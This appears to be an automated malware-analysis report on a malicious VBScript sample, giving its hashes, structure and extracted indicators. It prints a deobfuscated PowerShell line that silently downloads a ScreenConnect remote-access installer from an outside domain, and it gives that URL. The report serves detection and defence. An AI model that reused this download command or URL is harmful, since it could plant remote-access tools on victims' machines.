Malicious

ad0c043d74f5216aabd9b7a6320d3596

VBScript | MD5: ad0c043d74f5216aabd9b7a6320d3596 | Size: 2.15 KB | text/vbscript

Characteristics
Hash
Hash Value
MD5
ad0c043d74f5216aabd9b7a6320d3596
Sha1
deccab6215c588b453ace937a4319e3da9e183db
Sha256
ec6069de8aadd7f83d0d251c51c00ff009a0e3bfd8b4a0b19e269f08e15ce9b2
Sha384
c42d612863e7815c211f2237f851e72a672dfc052d9afa8adf5c0f8f9928db0e198bdaf69e0019154c230225e6fc47df
Sha512
2629b9d2f1167f2cf60663ce8523d8199cdf5749b97d353831311830699f37a192410cffab5396e244d7ef45bb7a491c4f364dada5839dd9716d6ef64b12f5df
SSDeep
48:HMqmXt/0mDIn7i/YZrOIzf/jUn/1eC/xZ28WHAz:KHo7i/YJRD/jUn/1Z/728qm
TLSH
5E41211FBE0AB270983257B68A66DC1DD8D05863242A5C94B58CC4C28F3037DFA945FA
File Structure
ad0c043d74f5216aabd9b7a6320d3596.deobfuscated.vbs
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
Value
URLs in VB Code - #1

https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest

Deobfuscated PowerShell

"$ProgressPreference='SilentlyContinue';Invoke-WebRequest -Uri 'https://app.yeanizssike.icu/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile '"

Characteristics
No malware configuration was found at this point.